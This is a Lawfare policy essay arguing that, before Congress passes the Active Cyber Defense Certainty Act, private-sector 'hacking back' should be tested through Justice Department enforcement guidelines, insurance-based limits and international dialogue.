Self-Help in Cyberspace: A Path Forward
Recent years have seen sustained calls to “unleash” the private sector to more assertively combat cyber threats. The argument has gained some sympathy in Congress, where Rep. Tom Graves (R-Ga.) recently reintroduced the Active Cyber Defense Certainty Act (ACDCA).
Published by The Lawfare Institute
in Cooperation With
Recent years have seen sustained calls to “unleash” the private sector to more assertively combat cyber threats. The argument has gained some sympathy in Congress, where Rep. Tom Graves (R-Ga.) recently reintroduced the Active Cyber Defense Certainty Act (ACDCA). As Bobby Chesney summarizes, the act, if passed, would amend the Computer Fraud and Abuse Act (CFAA) to allow private entities, under certain conditions, to engage in defensive measures that intrude into attackers’ networks for purposes of attributing, disrupting or monitoring malicious activity.
Motivating this renewed push for active defense is a growing recognition of the magnitude of the peril that cyberattacks present to the private sector, along with limits on the government’s ability to arrest its growth and bring the perpetrators to justice. As former director of the National Security Agency Gen. Michael Hayden put it, “[T]he cyber cavalry ain’t coming.” However, notwithstanding the benefits of harnessing private-sector expertise to improve cyber defense, the ACDCA is premature and of uncertain efficacy, and is potentially even risky from both domestic and international perspectives. A dual-track approach is therefore essential: The United States should prudently explore acceptable domestic parameters for the practice of private-sector “self-help” in cyberspace and engage other nations to harmonize these standards internationally. The Justice Department can lead such an approach and—by exercising prosecutorial discretion within the limits of existing law—begin to define the scope and parameters for responsible private-sector conduct in this domain.
The reintroduction of the ACDCA has predictably elicited two familiar sets of objections. One is that any effort to create space for more assertive defenses is dangerous; the other is that such efforts are unnecessary or even irrelevant. The former objection resurfaces the opposition to private-sector engagement in “hacking back,” citing risks of collateral damage from misattribution, escalation, abuse by corporations for competitive advantage, getting in the way of governmental operating space, and the potential for triggering an international incident when defensive measures cross national boundaries. The other source of opposition stems from the belief that such a move would have dubious utility, as it would hardly change the calculus for most corporations considering engaging in active cyber defense. In this view, what holds corporations back from practicing more assertive cyber defense at present is not only legal constraints (which companies can bypass if they wish by using proxies and foreign operating bases) but also concerns over uncertain efficacy, liability and reputational damages. Moreover, the ACDCA addresses only criminal liability under the CFAA, giving corporations little clarity regarding other state laws and a number of statutes relating to electronic surveillance potentially in play.
There are growing signs that some corporations already offer active defense services (including some of the most aggressive and reckless forms) within the rapidly growing global industry of cybersecurity providers, where many nations lack the resources and/or motivation to monitor or police such action. And demand for active cyber defense is likely to rise further with increasingly frequent and costly cyberattacks. In this transnational context, the rules of the road for private actors’ self-help are even less discernible.
“People are conducting active defense,” as Gen. Hayden argues, and “at some point the government’s going to want to control it. And the only way you can control it, is to organize it, and grant some authorities.” Yet the need to balance the various equities at stake—privacy and accountability alongside security and protection of corporate equities—is difficult in the absence of clear-cut use cases and extensive experience with active defense practices. Drawing these practices into the open is thus essential in order to inform sound judgment. And time is of the essence in doing so.
This arrangement is clearly superior to the murky present situation, which leaves it to general counsels of corporations (and in some cases their top management) to navigate the uncertain application of numerous laws based on risk appetites and defensive needs. Clearer delineation would be especially helpful for corporations that otherwise lack the resources and legal acumen to engage in such internal deliberations—which includes all but the most sophisticated companies.
In addition to setting clear outer boundaries for the permissible space for corporate engagement in active cyber defense, it is important to stipulate that even within this limited spectrum, corporations should not be incentivized to take a more assertive posture in defense of their equities. Instead, they ought merely to be given the latitude to weigh—generically and in every case they face—the risks and costs of inaction versus the potential benefits of legally permitted and assertive defenses, alongside the risks that action could pose. Both action and inaction could affect the companies’ operations, reputation, third-party liabilities and so on. It is important to consider not just legal limits but also the entire incentive structure shaping such a calculus. In the real world, insurance, civil liability and other market forces that shape the calculus often play central roles in defining de facto norms and parameters of responsible self-help.
Given that empirical data on the actual practice of active cyber defense is simply unavailable—at least publicly, as those who engage in it are unlikely to admit to it—all that is possible for now is to consider the hypothetical benefits and drawbacks of self-help in cyberspace. We have done so elsewhere, identifying the circumstances and conditions that should define responsible conduct, as well as specific measures that could conceivably be legally entrusted to corporate discretion because they potentially offer clear benefits to cybersecurity and manageable risks. The challenge now is to codify these distinctions between legitimate and illegitimate self-defense in cyberspace.
In the physical world, the difference between legitimate and illegitimate self-defense always comes down to a range of salient distinctions: the nature of the activity, the circumstances that serve to authorize action, the manner of conduct, etc. Yet in cyberspace, legitimate self-defense, in practice, is currently defined largely by only one parameter: the boundary of the network. Thus, actions whose effects are confined solely to the defender’s network are generally fair game under CFAA, while potentially any effect on the system of the attacker or a third-party risks violating the legal prohibition on accessing another computer “without authorization.” Some active defense measures, like beaconing, ought to be considered noncontentious, whereas others, like the kind of “digital booby trap” described by Gregory Falco and Herb Lin, would need to be carefully circumscribed to minimize risks to third parties notwithstanding the promise they hold.
To its credit, the proposed ACDCA, in its effort to redraw the boundaries of permissible active defense, offers a number of such additional distinctions and considerations. These include defining the legitimate aims and permissible impacts of acceptable active cyber defense to exclude, for instance, measures that would intentionally destroy others’ data or recklessly cause physical harm. But this effort inevitably faces the sobering reality that the paucity of data and pertinent experience, along with the constant evolution of technology and cyber threats, preclude definitive judgments about where to draw the line between permissible and prohibited forms of private self-defense in cyberspace. Moreover, this analysis must take into account the implications of a unilateral approach in what is inexorably a highly connected and interdependent global cyberspace. Even if active cyber defense is permitted in the United States, such measures impacting foreign networks would in all likelihood still violate domestic laws similar to the CFAA in other countries and could trigger demands for extradition.
This state of affairs leads us to recommend that any amendment to the CFAA should be preceded by a period of cautious experimentation with boundary setting and the collection of empirical data to assess the impact of such delineation. In between the undesirable extremes of inaction and “opening the floodgates,” there are intermediate options worth serious consideration. The Justice Department (or possibly the Department of Homeland Security) can lead such an approach, gradually creating space for responsible self-help while maintaining the ability to constrain that space quickly if necessary.
Toward that end, we have proposed a set of foundational principles that could inform Justice Department efforts to define the parameters of self-help. These encompass but go beyond the principles embodied in the current text of the ACDCA. They limit the purposes of defensive measures exclusively to preventing, disrupting or mitigating the damage of an attack; monitoring threats; or attributing attacks. They begin by taking off the table the riskiest measures, leaving only those that would conceivably be necessary and proportionate to threats. The employment of measures within this limited spectrum should then be conditional on certain prerequisites: minimal qualifications of personnel or certification of measures; formal authorization and oversight by top management; notification of law enforcement; contingency plans for unintended effects; and necessary preventive measures ensuring basic “cyber hygiene” before contemplating any more assertive options. These and other, more burdensome requirements can increase along the spectrum of defensive measures—for instance, more extensive reporting to de-conflict with government actors and requirements for third-party liability coverage for any employment of measures with potential out-of-network impacts. The ability to attain insurance coverage in itself creates an important barrier to entry for unqualified operators to undertake certain measures—precisely why such requirements are widely used to govern conduct in areas such as private investigators and private maritime (anti-piracy) security contractors. Active cyber defense, similarly, could be confined largely to cybersecurity services and major technology corporations with the capacity to pull off such sophisticated techniques. It could even be confined to measures developed and certified by the Department of Homeland Security or another capable actor. Through such principles and requirements, the spirit of the ACDCA’s call for only “qualified defenders” to undertake active cyber defense with “extreme caution” can be realized in practice.
At a minimum, these principles could form the basis of criteria used by the Justice Department in prosecuting violations of the CFAA. Ideally, the department could proactively issue guidelines clarifying the conditions under which it will exercise prosecutorial discretion in enforcing the CFAA’s prohibition on unauthorized access. This could come in the form of setting “enforcement priorities,” as has been practiced in other areas. In other words, the Justice Department could define certain circumstances in which it would not seek criminal prosecution of corporations engaging in unauthorized access for legitimate defense of themselves or their clients. Some form of notification or reporting requirements for private actors, along with a mechanism for the Justice Department to monitor behavior, would give the department flexibility to adjust the guidelines as experience accumulates.
In either situation, during this interim period the prospect of exposure to civil liability for disruption or harm to third parties (or excessive harm to the attacker) in the practice of active defense would act as a further hedge against overly assertive conduct. Insurers underwriting cyber risks could cover such third-party liabilities and in the process moderate the behavior of defenders and induce further caution (through prerequisites, coverage exclusions, etc.). In this way, insurers would act as a “proxy regulator,” further circumscribing the practice of self-help within the limits defined by law. As mentioned above, insurance has played this customary role in analogous areas like the use of private security contractors. In the process, the insurance industry may become the repository for insights and data needed to inform future debates over the efficacy of active cyber defense.
Congress could go one step further in a variation of this proposal by passing a statute authorizing the attorney general (or possibly the secretary of homeland security) to develop formal regulations for active cyber defense, including a sunset provision for these regulations to cease effect after a few years. This would lend further authority to guidelines and reduce the lingering uncertainty that corporations would face were the Justice Department to go it alone in articulating its enforcement priorities. After all, such priorities could be subject to change with the next administration, and, in any event, they could potentially leave corporations open to prosecution under individual states’ statutes similar to CFAA (though the prospects of such action would not loom large if corporations were to confine their active cyber defense practices to the parameters advocated here). A federal legislative solution could preempt state laws and provide a more stable outlook for corporations.
The fact that active cyber defense activities are likely being undertaken even now—and, as far as we’re aware, no entity has been prosecuted for such practice—suggests that there is a broad understanding that corporations need to defend their equities, or at least that prosecuting such cases is not a priority for the Justice Department. At least some private actors are already willing to push the boundaries. Bringing clarity to this space might dissuade corporations from contemplating the riskiest behavior, while encouraging more corporations to engage in some reasonable form of active cyber defense.
Whichever form of action the U.S. takes on the domestic front, a parallel effort needs to be taken to align U.S. practices with the evolution of corresponding norms on the international scene. This is essential in order to address the global ramifications of a more lenient U.S. environment and to minimize the prospects of legal action—including extradition requests—against U.S. entities engaging in or commissioning active cyber defense. Ideally, this would take the form of an international dialogue, with the aim of converging on a common understanding of what circumstances justify self-help responses to malicious cyber activity and the permissible parameters that should govern such action.
The U.N. Group of Governmental Experts and, even more importantly, the Budapest Convention on Cybercrime provide solid platforms for such discussions. The Budapest Convention commits signatories to criminalize certain cyber offenses when conduct occurs “without right.” As Paul Rosenzweig notes, this leaves room for states to determine when otherwise illegal activity might be justified. Furthermore, the convention’s Explanatory Report explicitly offers self-defense as one such potential justification. Even an informal dialogue among states and key corporate, technology and civil society players on the emerging norms around self-help in cyberspace would be beneficial.
This proactive approach to experimentation with self-help will not resolve the cybersecurity challenge, and it does entail some moderate risk taking. But it is clearly superior to the alternatives: either keeping the currently murky situation as is, or opening the floodgates to overly aggressive and risky actions. Testing the boundaries of active cyber defense may be the only way to begin to turn the tide against the perpetrators of cyberattacks.